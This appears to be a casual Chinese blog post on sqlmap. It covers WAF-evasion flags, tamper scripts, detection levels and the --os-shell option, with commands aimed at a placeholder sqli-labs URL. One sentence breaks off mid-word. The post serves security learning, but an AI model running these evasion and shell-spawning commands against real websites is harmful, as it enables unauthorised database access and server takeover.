接上文 滑稽(不是
sqlmap参数绕过:
#使用参数进行绕过
--random-agent 使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候
--time-sec=3 使用长的延时来避免触发WAF的机制,这方式比较耗时
--hpp 使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--ignore-proxy 禁止使用系统的代理,直接连接进行注入
--flush-session 清空会话,重构注入
--hex 或者 --no-cast 进行字符码转换
--mobile 对移动端的服务器进行注入
--tor 匿名注入
指定脚本进行绕过(--tamper):
有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效)
sqlmap 官方提供了53个绕过脚本,脚本目录在/usr/share/sqlmap/tamper中
指定单个脚本进行绕过:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper=space2plus.py
指定多个脚本进行绕过:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper="space2comment.py,space2plus.py"
然后就是我们的--level (探测等级)
sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为he
如果说奥 我们不知道注入点是啥 我们在url后面加一个?id=1 这是啥意思捏 滑稽(不是
这个意思就是说 我们已经是知道了注入点
执行操作系统命令(—os-shell)
在数据库为MySQL、PostgreSql或者SQL Server时,可以通过sqlmap执行操作系统命令
当为MySQL数据库时,需满足下面条件:
当前用户为 root
知道网站根目录的绝对路径
sqlmap -u "http://xxx.com/less/?id=1" --os-shell
咱就是说 能水一篇是一篇 感谢各位大佬三连 必回!
947
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
